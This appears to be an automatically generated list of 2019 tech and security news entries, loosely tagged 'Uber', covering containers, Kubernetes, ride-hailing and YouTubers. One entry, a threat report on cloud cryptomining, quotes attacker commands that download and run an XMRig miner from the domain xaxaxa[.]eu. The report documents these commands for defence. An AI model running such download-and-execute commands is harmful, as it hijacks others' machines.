Src |
Date (GMT) |
Title |
Description |
Tags |
Stories |
Notes |
|
2019-08-01 17:15:05 |
Practicing Safe Containerisation (direct link) |
Everyone knows that Kubernetes has won the container wars. Except what Kubernetes has won is the container runtime wars. You see, the container image war was won by Docker. That can be seen in the statistic that more than 1 billion Docker containers are downloaded every two weeks according to the State of Open Source Security Report 2019. …
The ISBuzz Post: This Post Practicing Safe Containerisation |
|
Uber
|
|
|
2019-07-30 12:09:05 |
Security a Top Concern as Containerization Gathers Pace (direct link) |
Within the increasing adoption of container technology, two things stand out: hybrid on-prem and cloud configurations are growing, and Kubernetes dominates. At the same time, concern over investment in security remains high.
|
|
Uber
|
|
|
2019-07-26 07:19:00 |
Password security: 6 best practices that make a difference (direct link) |
A password is a bit like a toothbrush: it must be good, it is not shared, and it is replaced every quarter, according to Christophe Auberger, Director System Engineering, Fortinet. |
|
Uber
|
|
|
2019-07-23 12:36:00 |
Critical flaw in Palo Alto VPN solution impacts Uber, other enterprises may be at risk (direct link) |
Updated: The critical vulnerability exists in old, vulnerable versions of the software still in use by companies including Uber. |
Vulnerability
|
Uber
|
|
|
2019-07-16 13:12:01 |
Developers: Build cloud-native apps for Kubernetes faster with these open source IBM tools (direct link) |
IBM's new open source projects aim to lower the barrier for entry for developers to use Kubernetes. |
|
Uber
|
|
|
2019-07-11 13:00:00 |
'Blitzscaling' Is Choking Innovation-and Wasting Money (direct link) |
Opinion: VCs are making bigger bets on fewer startups. It's this unconsidered, money-slinging strategy that led to Uber's and Lyft's dud IPOs. |
|
Uber
|
|
|
2019-07-07 11:00:00 |
Public Transit Agencies Think Rewards Programs Can Bring Back Riders (direct link) |
Following the example set by airlines, Uber, and Lyft, public transportation officials are creating frequent-flier-like systems to goose ridership. |
|
Uber
|
★★
|
|
2019-06-29 11:00:00 |
Transit Agencies Turn to Uber for the Last Mile (direct link) |
Transit systems worry about losing passengers to ride-hail services. But some agencies are also testing using Uber in place of low-ridership lines. |
|
Uber
|
|
|
2019-06-27 21:04:05 |
The Quiet Force of YouTuber Etika's Gaze (direct link) |
We will never know for certain what more Desmond Amofah wanted to communicate-but we can hazard a guess. |
|
Uber
|
|
|
2019-06-26 20:51:02 |
Kubernetes CLI tool security flaw lets attackers run code on host machine (direct link) |
Interesting bug can lead to total compromise of cloud production environments. |
Guideline
Tool
|
Uber
|
|
|
2019-06-26 17:08:01 |
The Psychological Impact of Seeing YouTubers Spend Millions (direct link) |
Flexing on video has become incredibly popular. But their excess consumerism could be harming their viewers' wellbeing. |
|
Uber
|
|
|
2019-06-20 16:30:04 |
Epic Games Sues YouTuber CBV for Selling Fortnite Cheats (direct link) |
In a lawsuit filed Tuesday, Epic Games is suing a YouTuber who goes by the name CBV for allegedly selling Fortnite cheats and ruining the game for other users. [...] |
|
Uber
|
|
|
2019-06-20 11:00:04 |
MongoDB Introduces Client-Side Field Level Encryption to Aid Compliance (direct link) |
MongoDB Inc, developer of the NoSQL MongoDB document-based database management product, has announced the latest version, 4.2. The primary new features are distributed transactions, an updated Kubernetes Operator, and client-side field level encryption.
|
|
Uber
|
|
|
2019-06-19 04:00:00 |
How to get a single-node Kubernetes deployment up in seconds (direct link) |
How do you launch a single-node Kubernetes deployment in seconds? With the help of Microk8s. |
|
Uber
|
|
|
2019-06-18 17:03:04 |
The YouTubers Who Changed the Landscape for #NaturalHair (direct link) |
“It's just hair, but it's more than that. Every culture has held meaning in hair.” |
|
Uber
|
|
|
2019-06-15 11:00:00 |
New York City Flexes Again, Extending Cap on Uber and Lyft (direct link) |
Officials want to extend the city's limit on the number of for-hire vehicles, and may consider a congestion charge. |
|
Uber
|
|
|
2019-06-07 22:28:03 |
Lyft's Lawsuit Against San Francisco Is Bigger Than Bike-Share (direct link) |
Lyft's bike-share company, Motivate, had an exclusive contract with the city for its docked bike program. But if San Francisco allows a dockless bike program, Uber could muscle in on Lyft's territory. |
|
Uber
|
|
|
2019-06-01 13:00:00 |
The YouTuber on a Mission to Save the Classic RPG (direct link) |
English professor Matt Barton is out to draw attention to the bygone favorites of the genre. |
|
Uber
|
|
|
2019-05-31 12:00:00 |
Generative Music Apps: Endel, Mubert, Hear (direct link) |
Who needs Spotify playlists? These apps create truly endless tunes to match whatever mood you desire. |
|
Uber
|
|
|
2019-05-30 22:44:01 |
California Lawmakers Move to Protect Gig-Economy Workers (direct link) |
The California Assembly passed a bill that would require services such as Uber and Lyft to classify their workers as employees, rather than contractors. |
|
Uber
|
|
|
2019-05-29 18:51:04 |
NIST's privacy framework lets privacy tell its own story (direct link) |
|
|
Uber
|
|
|
2019-05-24 13:00:00 |
How to Solve a Rubik's Cube in 5 Seconds-or Less (direct link) |
The world record for unscrambling a Rubik's cube keeps dropping, as fleet-fingered speedcubers hone their pattern recognition and "lookahead" skills. |
|
Uber
|
|
|
2019-05-22 13:00:03 |
CloudGuard IaaS Supports Kubernetes and Container Security (direct link) |
By Amir Kaushansky, Product Manager, Cloudguard IaaS, published May 29th, 2019. Almost 9000 people attended Check Point's CPX 360 events in Bangkok, Las Vegas and Vienna earlier this year where we shared security best practices, product developments and roadmap with our customers and partners. My session was about Kubernetes and Container Security. At…
|
|
Uber
|
|
|
2019-05-21 18:13:00 |
Capital One's Critical Stack platform aims to secure cloud migration and deployment (direct link) |
Capital One released Critical Stack, a Kubernetes container orchestration platform in an effort to cultivate a developer ecosystem. |
|
Uber
|
|
|
2019-05-21 14:40:05 |
Gigamon Launches New Tool To Shine Light On Digital Apps Within the Enterprise. (direct link) |
Gigamon Application Intelligence provides visibility into complex digital apps, helping companies with their digital transformation. A failure to transform digitally, and keep pace with the likes of Airbnb and Uber, has been cited as the main reason over half of the Fortune 500 companies have disappeared since 2000. But to successfully execute a digital transformation, […]
|
Tool
|
Uber
|
|
|
2019-05-15 12:51:00 |
Julia, Kubernetes, and Hadoop among the 20 fastest-growing freelancer skills (direct link) |
Skills related to IT, automation, and RPA saw increased demand in Q1 2019, according to Upwork. |
|
Uber
|
|
|
2019-05-13 11:00:00 |
Why Uber Is Fighting Cities Over Data About Scooter Trips (direct link) |
Los Angeles and other cities want detailed data on the shared scooters on their streets. Uber, Lyft and other companies fear a Trojan horse that could affect ride-hailing. |
|
Uber
|
★★★★
|
|
2019-05-12 13:00:00 |
Uber's Underwhelming IPO, Lyft Earnings and More Car News This Week (direct link) |
A decade after it was founded, Uber went public. Its shares fell almost 8% on their first day of trading. |
|
Uber
|
|
|
2019-05-10 23:15:02 |
Uber's IPO, the Call to Break Up Facebook, and More News (direct link) |
Catch up on the most important news today in 2 minutes or less. |
|
Uber
|
|
|
2019-05-10 13:00:00 |
A Bet on Uber Is a Bet on Self-Driving (direct link) |
Uber is scheduled to go public Friday, at an initial valuation of $82 billion, the largest for an IPO since 2014. But its future may rest on eliminating drivers. |
|
Uber
|
|
|
2019-05-09 01:00:05 |
On Eve of Uber's IPO, Ride-Hail Drivers Stage Protests (direct link) |
Uber and Lyft drivers shut their apps Wednesday to protest for better pay and benefits, and recognition as employees rather than contractors. |
|
Uber
|
|
|
2019-05-08 03:10:00 |
Scammers Try to Trick YouTubers Into Giving Up Password (direct link) |
A scammer looking to take over a YouTube account got a big fat nothing by targeting the owner of a channel that saw right through the fraud and spread the word about the attempt. [...] |
|
Uber
|
|
|
2019-05-07 17:40:00 |
In a Kubernetes vs. AWS world, Red Hat may hold the edge (direct link) |
Despite Amazon's embrace of Kubernetes, the open source container orchestration engine keeps dreams of a multicloud world alive. |
|
Uber
|
★★
|
|
2019-05-05 13:00:00 |
Tesla Raises Money, Drones Get Certified, and More Car News This Week (direct link) |
Tesla says it will raise up to $2.7 billion in new capital, and Uber prepares for its IPO. |
|
Uber
Tesla
|
|
|
2019-05-03 15:00:00 |
The top six takeaways for corporate data privacy compliance (direct link) |
Here are Labs' top six takeaways from our data privacy and cybersecurity law series on corporate data privacy compliance. From emerging startups to burgeoning enterprises, these rules help not just with legal liability, but also user trust.
Categories: Privacy, Security world
Tags: Apple, California Online Privacy Protection Act, cybersecurity law, cybersecurity laws, data breach notification, data breach notification law, Data privacy, data privacy compliance, data privacy law, data privacy laws, data privacy legislation, gdpr, General Data Protection Regulation, Helix DNA, mozilla, online privacy, personal data, personal information, personally identifiable information, privacy policy, protonmail, signal, Uber, user privacy, whatsapp
|
|
Uber
|
|
|
2019-04-19 19:27:04 |
Uber Recruits Some Rich Friends to Drive Its Autonomous Cars (direct link) |
Toyota, Japanese auto supplier Denso, and the Softbank Vision Fund are investing $1 billion in Uber's self-driving car unit. |
|
Uber
|
|
|
2019-04-12 20:49:02 |
Gadget Lab Podcast: What Happens to Uber After Its IPO? (direct link) |
WIRED Transportation reporter Aarian Marshall joins the Gadget Lab podcast to talk about what Uber's IPO means for the future of ride-sharing ... and everything else Uber does. |
|
Uber
|
|
|
2019-04-12 00:54:03 |
Ahead of IPO, Uber's Losing Less-but Growing Less, Too (direct link) |
Uber revealed its plans to go public, just weeks after rival Lyft. The filing shows Uber dwarfs Lyft, but continues to post operating losses. |
|
Uber
|
|
|
2019-04-09 19:25:02 |
Google Cloud Platform launches Cloud Run, aims to bring enterprise workloads to serverless, Kubernetes (direct link) |
Google's aim for Cloud Run is to make it easier to run more enterprise workloads via containers, integration, and serverless functions. |
|
Uber
|
★★★★
|
|
2019-04-09 13:52:03 |
Uber launches free ride voucher program to help businesses attract and retain customers (direct link) |
Businesses can now take advantage of Uber Vouchers to offer the perk of free rides. |
|
Uber
|
|
|
2019-04-08 13:00:00 |
Understanding “container security” (direct link) |
Containers and container security
Do you docker? Without a doubt, containers are one of the hottest concepts in application delivery and security these days. And that’s a very good thing. Containers have tremendous advantages over the way we have done things in the past. But how should containers influence a threat detection and response strategy? Do I need a larger “container security” strategy to get started deploying my apps using container architectures?
The short answer to these questions is “No.” But let’s explore that a bit more.
What is a container?
A container is an evolution of virtualization. Traditionally, virtualization requires entire “guest operating systems” to be deployed on a hypervisor or host operating system. This was an amazing breakthrough as it blew up the traditional relationship between hardware and operating systems, enabling the deployment of different application building blocks in different VMs on the same or different hardware. Thus it created new ways to build and scale applications. This transition changed how we think about compute resources, moving us from “pets” to “cattle”. Yet each VM carried along with it an entire operating system worth of overhead.
Containers fix this problem by virtualizing only the application and all the associated dependencies it has (shared libraries, file systems, etc.), allowing many more containers to ride on a single operating system. This makes them much, much more efficient. They also have the advantage of being portable across operating systems; they are truly platform agnostic.
Docker security and Kubernetes security are simply the most well known
There are many kinds of containers; Docker is only the most popular. In addition to the containers themselves, most deployments benefit from orchestration and management tools. Kubernetes is the most well-known of these, and Swarm and Mesos are others. These tools handle all aspects of the container lifecycle, helping build consistent container images, deploy them into production, monitor their performance, and decommission them when the time comes.
Easier, safer: benefits of containers, as they relate to security
The isolation provided by containers enables us to better scale and modularize our applications into smaller pieces. But what does it do for our security? LOTS! But containers don’t fundamentally change anything we need to do in the threat detection and response area.
Containers make it extremely easy to reduce our attack surface area. In fact, Docker containers use a “Docker file” that defines many things, including what IPs, ports, and protocols the container can use for communication. Because containers are intended to be used for modular workloads, it isn’t difficult to determine what these ports and protocols should be, making it simple to realize the idea of providing only essential access while keeping things simple.
Another key security advantage of containers is, of course, the isolation they provide. If the application inside your container falls victim to an attack, the attacker will find themselves in a very restricted area with only a small part of the application code and user data present. In fact, management connectivity via SSH and the like is often unnecessary in containers, making them even harder to access remotely. Of course, lateral movement or privilege escalation may be possible when vulnerabilities are present. But even if containers are compromised, they have huge advantages. Because they are designed to be ephemeral, remediation of an infected container can be as simple as blowing it |
|
Uber
|
|
|
2019-04-03 17:34:03 |
For Potential Investors in Lyft and Uber, It's Buyer Beware (direct link) |
Lyft leads an expected wave of big IPOs, from Uber, Pinterest, and others. These firms are stronger than the dotcoms, but that doesn't make them good investments. |
Guideline
|
Uber
|
|
|
2019-04-03 09:35:03 |
Fans of Swedish Youtuber PewDiePie spread malware to increase channel subscriptions. (direct link) |
PewDiePie, the famous Swedish Youtuber, is no stranger to controversy. This time he is in the news again for the wrong reason after a user, who claims to be his fan, released ransomware with a note that reads 'Subscribe to PewDiePie'. According to The Independent, the ransomware PewCrypt is designed in such a way that […]
|
Ransomware
Malware
|
Uber
|
★★★★
|
|
2019-03-28 16:40:01 |
Thoughts on OSSEC Con 2019 (direct link) |
Last week I attended my first OSSEC conference. I first blogged about OSSEC in 2007, and wrote other posts about it in the following years.
OSSEC is a host-based intrusion detection and log analysis system with correlation and active response features. It is cross-platform, such that I can run it on my Windows and Linux systems. The moving force behind the conference was a company local to me called Atomicorp.
In brief, I really enjoyed this one-day event. (I had planned to attend the workshop on the second day but my schedule did not cooperate.) The talks were almost uniformly excellent and informative. I even had a chance to talk jiu-jitsu with OSSEC creator Daniel Cid, who despite hurting his leg managed to travel across the country to deliver the keynote.
I'd like to share a few highlights from my notes.
First, I had been worried that OSSEC was in some ways dead. I saw that the Security Onion project had replaced OSSEC with a fork called Wazuh, which I learned is apparently pronounced "wazoo." To my delight, I learned OSSEC is decidedly not dead, and that Wazuh has been suffering stability problems. OSSEC has a lot of interesting development ahead of it, which you can track on their Github repo.
For example, the development roadmap includes eliminating Logstash from the pipeline used by many OSSEC users. OSSEC would feed directly into Elasticsearch. One speaker noted that Logstash has a 1.7 GB memory footprint, which astounded me.
On a related note, the OSSEC team is planning to create a new Web console, with a design goal to have it run in an "AWS t2.micro" instance. The team noted that instance offers 2 GB memory, which doesn't match what AWS says. Perhaps they meant t2.micro and 1 GB memory, or t2.small with 2 GB memory. I think they mean t2.micro with 1 GB RAM, as that is the free tier. Either way, I'm excited to see this later in 2019.
Second, I thought the presentation by security personnel from USA Today offered an interesting insight. One design goal they had for monitoring their Google Cloud Platform (GCP) was to not install OSSEC on every container or on Kubernetes worker nodes. Several times during the conference, speakers noted that the transient nature of cloud infrastructure is directly antithetical to standard OSSEC usage, whereby OSSEC is installed on servers with long uptime and years of service. Instead, USA Today used OSSEC to monitor HTTP logs from the GCP load balancer, logs from Google Kubernetes Engine, and monitored processes by watching output from successive kubectl invocations.
Third, a speaker from Red Hat brought my attention to an aspect of containers that I had not considered. Docker and containers had made software testing and deployment a lot easier for everyone. However, those who provide containers have effectively become Linux distribution maintainers. In other words, who is responsible when a security or configuration vulnerability in a Linux component is discovered? Will the container maintainers be responsive?
Another speaker emphasized the difference between "security of the cloud," offered by cloud providers, and "security in the cloud," which is supposed to be the customer\ |
Vulnerability
|
Uber
|
|
|
2019-03-27 15:42:01 |
Container adoption increasing as businesses increasingly rely on multicloud deployments (direct link) |
Expectations that applications can be migrated seamlessly across clouds are fueling the adoption of Kubernetes and other container platforms. |
|
Uber
|
|
|
2019-03-25 09:49:05 |
PewDiePie ransomware oblige users subscribe to PewDiePie YouTube channel (direct link) |
It is a battle with no holds barred between T-Series and PewDiePie, their fans are spreading the PewDiePie ransomware to force users to subscribe to PewDiePie Youtube channel. The story I’m going to tell you is another chapter of the battle between the most followed Youtuber T-Series and PewDiePie. T-Series is an Indian music company, […]
|
Ransomware
|
Uber
|
|
|
2019-03-20 15:05:01 |
Uber Deployed 'Surfcam Spyware' in Australia to Crush the Competition – Report (direct link) |
Until a report this week, Uber's Surfcam's use was thought to be limited to incidents uncovered in Singapore in 2017. For its part, Uber denies that it's a "spyware." |
|
Uber
|
|
|
2019-03-14 14:55:00 |
Making it Rain - Cryptocurrency Mining Attacks in the Cloud (direct link) |
By Chris Doman and Tom Hegel
Organizations of all sizes have made considerable shifts to using cloud-based infrastructure for their day-to-day business operations. However, cloud security hasn't always kept up with cloud adoption, and that leaves security gaps that hackers are more than happy to take advantage of.
One of the most widely observed objectives of attacking an organization's cloud infrastructure has been for cryptocurrency mining. Despite recent falls in cryptocurrency prices, mining campaigns continue to plague organizations. Below, we've shared some of the more noteworthy forms of attack where the hackers’ end objective is to use your cloud infrastructure to mine cryptocurrency.
Compromised Container Management Platforms
We've seen attackers using open APIs and unauthenticated management interfaces to compromise container management platforms.
We recently investigated attacks involving mining malware served from the domain xaxaxa[.]eu. That domain may sound familiar, as it appeared in a February 2018 report by RedLock on the compromise of the Kubernetes infrastructure of an electric car company. The report details the container commands showing the malicious request.
RedLock reported the attackers used the compromised Kubernetes server in Amazon Web Services to mine Monero and potentially access customer data. In the event of such unrestricted access, cryptocurrency mining is one of the least malicious outcomes to victim organizations. For example, customer data and business operations could be at risk for theft or malicious modification.
Following the attention of the report by RedLock, the owners of xaxaxa[.]eu published a Public Notice stating that they are just a mining proxy and are not responsible for any malicious activity themselves.
Notably, we have also observed the domain serving pages saying it is a Dynamic Domain and a Vesta Control Panel. However, we have seen from other attacks listed in this article that the root domain is actively involved in serving malware and implicated in other campaigns.
Control Panel Exploitation
We have also observed attacks aimed at the control panels of web hosting solutions. The impact is similar to the previous topics, essentially allowing administrative control over web services for the execution of malicious code.
In April 2018, the same attackers that compromised Kubernetes infrastructure started exploiting an unknown vulnerability in VestaCP. This was followed by frantic posts on the official VestaCP forums and those of web-hosts that run VestaCP. VestaCP users provided details on how their installations were compromised.
In these attacks, they added a new backdoor user called “sysroot,” and then downloaded and installed the XMRig application to mine Monero cryptocurrency.
pkill -f xmrig;
wget -O /tmp/gcc http://xaxaxa[.]eu/gcc;
chmod +x gcc;
wget -O /tmp/config_1.json http://xaxaxa[.]eu/config_1.json;
/tmp/gcc -c /tmp/config_1.json;
Lastly, the |
Guideline
|
Uber
Tesla
|
|
|
2019-03-13 22:18:00 |
Colleges Need Influencers, but Do Influencers Need College? (direct link) |
About a third of Gen Z wants to grow up to be YouTubers. Which doesn't really require a college education. |
|
Uber
|
|
|
2019-03-06 19:47:02 |
Waymo Is Selling the Lidar Tech It Fought Uber to Protect (direct link) |
The shift to sell its technology to robotics and security companies is an indication that Waymo isn't placing all its bets on self-driving cars. |
|
Uber
|
|